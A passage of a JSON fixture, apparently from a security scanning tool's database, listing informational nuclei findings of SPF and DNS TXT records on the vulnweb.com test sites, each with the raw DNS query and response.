SECTION:\n;testaspnet.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 20044\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testaspnet.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestaspnet.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:0I73u7E64LVLWuS-nT9ssWHaHOI36n65prWVTGJklFo"\ntestaspnet.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 17, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:35.084Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 34157\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 34157\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 18, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:0I73u7E64LVLWuS-nT9ssWHaHOI36n65prWVTGJklFo\\\"\", \"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:34:35.159Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 20044\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testaspnet.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 20044\n;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testaspnet.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestaspnet.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:0I73u7E64LVLWuS-nT9ssWHaHOI36n65prWVTGJklFo"\ntestaspnet.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 19, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:35.243Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 34157\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 34157\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 20, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:35.320Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 55536\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 55536\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 21, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:35.412Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 55536\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 55536\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 22, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:35.494Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 8150\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 8150\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 23, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:35.586Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 8150\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 8150\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 24, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:35.668Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 59013\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 59013\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 25, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:35.770Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 59013\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 59013\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 26, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:35.884Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 7466\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 7466\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 27, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:35.987Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 7466\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 7466\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 28, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:36.101Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 17834\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 17834\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 29, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:36.213Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 17834\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 17834\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 30, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:36.306Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 23079\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 23079\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 31, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:36.387Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 23079\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 23079\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 32, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:36.476Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 19184\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 19184\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3600\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 33, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"v=spf1 -all\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": 